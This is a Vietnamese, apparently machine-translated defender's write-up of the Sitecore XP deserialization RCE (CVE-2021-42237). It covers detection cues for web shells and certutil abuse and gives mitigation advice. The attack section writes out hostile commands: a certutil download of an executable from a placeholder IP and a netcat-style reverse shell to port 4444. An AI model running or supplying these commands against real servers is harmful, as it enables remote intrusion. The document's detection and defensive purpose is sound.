Quan điểm của một Defender về Sitecore XP Deserialization RCE (CVE-2021–42237)

Sitecore's Experience Platform (XP) là một hệ thống quản lý nội dung doanh nghiệp (CMS) .NET. Sitecore XP cung cấp cho bạn các công cụ để quản lý nội dung, tiếp thị kỹ thuật số cũng như phân tích và báo cáo.
CVE-2021–42237
Sitecore XP 7.5 Bản phát hành ban đầu cho Sitecore XP 8.2 Bản cập nhật-7 dễ bị tấn công không an toàn khi có thể thực hiện lệnh từ xa trên máy. Không cần xác thực hoặc cấu hình đặc biệt để khai thác lỗ hổng này.
Các khái niệm chính trước khi bắt đầu
Hủy đăng ký không an toàn
Tuần tự hóa là việc chuyển đổi một đối tượng thành một dòng byte tĩnh, có thể được lưu vào cơ sở dữ liệu hoặc truyền qua mạng. Deserialization là quá trình ngược lại của quá trình đó, tạo lại cấu trúc dữ liệu hoặc đối tượng từ một dòng byte.
Lỗ hổng bảo mật xảy ra khi dữ liệu không đáng tin cậy được sử dụng để lạm dụng logic của ứng dụng, gây ra cuộc tấn công từ chối dịch vụ (DoS) hoặc thậm chí thực thi mã tùy ý khi nó được giải mã.
Khi dữ liệu có thể kiểm soát của người dùng được giải mã bởi một trang web, điều này có khả năng cho phép kẻ tấn công thao túng các đối tượng được tuần tự hóa để chuyển dữ liệu có hại vào mã ứng dụng.
Web Shell
Web shell thường là một đoạn mã độc hại nhỏ được viết bằng các ngôn ngữ lập trình phát triển web điển hình (ví dụ: ASP, PHP, JSP) mà những kẻ tấn công cấy ghép trên các máy chủ web để cung cấp quyền truy cập từ xa và thực thi mã tới các chức năng của máy chủ.
Phiên bản IIS (w3wp.exe) đang chạy các quy trình đáng ngờ như 'cmd.exe / c echo', 'certutil.exe' hoặc 'powershell.exe' dẫn đến việc tạo các tệp script trong các thư mục có thể truy cập web là một sự kiện hiếm gặp và thường là một dấu hiệu mạnh mẽ của hoạt động web shell.
Cộng tác viên ợ
Một dịch vụ mạng mà Burp Suite sử dụng để giúp phát hiện nhiều loại lỗ hổng bảo mật.
Máy khách Cộng tác viên có thể được sử dụng để tạo các tải trọng để sử dụng trong thử nghiệm thủ công và thăm dò ý kiến của máy chủ Cộng tác viên về bất kỳ tương tác mạng nào là kết quả của việc sử dụng các tải trọng đó.
CertUtil
Một tệp nhị phân Windows được sử dụng để xử lý chứng chỉ.
Mục đích sử dụng của certutil là để Dump và hiển thị thông tin cấu hình của tổ chức chứng nhận (CA), định cấu hình Dịch vụ chứng chỉ, sao lưu và khôi phục các thành phần CA và xác minh chứng chỉ, cặp khóa hoặc chuỗi chứng chỉ. Tuy nhiên, những kẻ tấn công có thể sử dụng công cụ này để tìm nạp dữ liệu từ Internet bằng lược đồ URL (ftp: //, http: //, v.v.).
Một cuộc tấn công điển hình sẽ như thế nào?
- Sitecore XP sử dụng tính năng giải mã không an toàn trong tệp Report.ashx có thể bị kẻ tấn công lợi dụng để thực thi mã tùy ý trên hệ thống
- Các nỗ lực quét trên máy chủ dễ bị tấn công
URI: “/sitecore/shell/ClientBin/Reporting/Report.ashx”
nslookup 5ouceXYZQtem.burpcollaborator.net
“C:\Windows\System32\cmd.exe” /c certutil -urlcache -f https://5ouceXYZQtem.burpcollaborator.net
certutil -f -urlcache http://A.B.C.D:8000/file.exe C:\Windows\Temp\file.exe
C:\Windows\Temp\file.exe A.B.C.D 4444 -e cmd
- Việc sử dụng certutil đáng ngờ
Xác định certutil.exe tạo kết nối mạng. Kẻ thù có thể lạm dụng certutil.exe để tải xuống chứng chỉ hoặc phần mềm độc hại từ một URL từ xa. Liên kết cho quy tắc Sigma. - Lưu lượng truy cập nslookup đáng ngờ
thực thi và truy vấn nslookup.exe đối với miền * .burpcollaborator.net
Giải pháp được khuyến nghị là nâng cấp lên phiên bản an toàn, lý tưởng nhất là Sitecore XP 9.0 trở lên. Ngoài ra, lỗi có thể được giảm thiểu bằng cách xóa tệp Report.ashx khỏi “/sitecore/shell/ClientBin/Reporting/Report.ashx” trên tất cả các phiên bản máy chủ.
Người giới thiệu
https://blog.assetnote.io/2021/11/02/sitecore-rce/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42237
https://lolbas-project.github.io/lolbas/Binaries/Certutil/